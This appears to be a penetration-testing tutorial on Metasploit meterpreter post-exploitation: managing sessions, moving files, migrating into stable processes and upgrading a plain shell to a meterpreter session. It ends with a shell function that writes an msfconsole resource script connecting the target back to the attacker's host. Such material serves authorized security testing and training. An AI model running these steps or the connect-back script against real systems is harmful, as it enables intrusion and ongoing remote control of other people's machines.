Meterpreter shell for post-exploitation
By now you probably have some kind of shell on the target. If it is not a meterpreter shell, you should try to turn it into one, since meterpreter gives you a lot of post-exploitation tools with very little effort.
So create a meterpreter payload with msfvenom or something similar (a php shell, or whatever the target can run), get it onto the box, execute it, and catch the connection with a handler to get your meterpreter session. Check out the chapter Exploiting/Msfvenom for more about creating payloads.
List all commands with help.
Get help about a specific command with help followed by the command name.
So first some basics. You can put the meterpreter session into the background with the command
background. This is useful if you have several sessions going at the same time, or if you want to go back to msfconsole to run a module against the session.
List background sessions with sessions -l.
Connect back to a background session with sessions -i followed by its number, for example
sessions -i 1
Upload and download files with upload (local file first, then remote path) and download (remote file first, then local path).
A really common and useful script built into metasploit is the migrate script. If you got the shell through an exploit that crashes a program, the user might close that program and it will close your session with it. So you should migrate your session into another, more stable process, one running as the same user or one you have the privileges to inject into. You can do that with migrate.
First run ps to list all processes.
Now you choose one and run
run migrate -p 1327
-p is the PID of the process. Current meterpreter versions also have migrate as a built-in command, so migrate 1327 does the same thing.
There are tons of modules specifically created for post-exploitation. In msfconsole they live under post/ and can be listed with search type:post; from a meterpreter session you run one with run followed by the module path.
There is a point in doing things through metasploit even when meterpreter is not directly available. For example, if you find an exploit that does not offer meterpreter as a payload, you can start with a normal shell and then upgrade it. To do that you do the following:
First you get a shell through metasploit, either through a specific exploit or through an msfvenom shell that you upload and run. Now that you have a normal shell it is time to upgrade it to a meterpreter shell.
First we have to leave the shell without killing it. A plain shell has no background command, so press Ctrl-Z and answer y when msfconsole asks:
Background session 2? [y/N] y
Now we have that shell running in the background, and you can see it with sessions -l.
And you can connect to it again with
sessions -i 1
or whatever the number of the session is.
So now we have the shell running in the background. It is time to upgrade it with the post/multi/manage/shell_to_meterpreter module: select it with use, then point it at your own address and at the session you want to upgrade:
set LHOST ip
set session 1
Here ip is the address of your attacking machine as the target can reach it; the module starts a new handler on it and makes the old shell connect back, so a wrong LHOST just leaves a handler nobody connects to. Then run, and the meterpreter session shows up as a new session next to the old shell in sessions -l.
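The upgrade above is something you end up typing over and over, so it is worth putting into an msfconsole resource script. The following is an added example, not code from the original page or from the Metasploit project: a POSIX sh function that emits the resource-script lines for the shell_to_meterpreter procedure and refuses a malformed session id or LHOST before they reach the console. The session number 1, the address 10.10.14.3, the file name upgrade.rc and the default port 4444 are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not part of the original page. Builds an msfconsole
# resource script for the post/multi/manage/shell_to_meterpreter upgrade.

# LHOST is the address the target connects back to; a typo here just gives
# a handler nobody reaches, so only accept a real dotted-quad IPv4 address.
valid_ipv4() {
  ip="$1"
  case "$ip" in
    ""|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  old_ifs="$IFS"
  IFS=.
  set -- $ip            # split on the dots into positional parameters
  IFS="$old_ifs"
  [ "$#" -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Print the resource-script lines that upgrade session $1.
# $2 is LHOST, $3 (optional, assumed default 4444) is the LPORT the
# module's new handler listens on.
upgrade_rc() {
  sid="$1"
  lhost="$2"
  lport="${3:-4444}"
  case "$sid" in
    ""|*[!0-9]*) echo "bad session id: $sid" >&2; return 1 ;;
  esac
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  printf '%s\n' \
    "use post/multi/manage/shell_to_meterpreter" \
    "set SESSION $sid" \
    "set LHOST $lhost" \
    "set LPORT $lport" \
    "run" \
    "sessions -l"
}

# Example run (constructed values): session 1, calling back to 10.10.14.3.
# Redirect the output into upgrade.rc and load it with
#   msfconsole -r upgrade.rc      or, inside a running console,
#   resource upgrade.rc
upgrade_rc 1 10.10.14.3
```

The last line of the generated script lists the sessions again so you immediately see whether a new meterpreter session appeared next to the old shell; if only the old shell is listed, check that LHOST is reachable from the target before trying anything else.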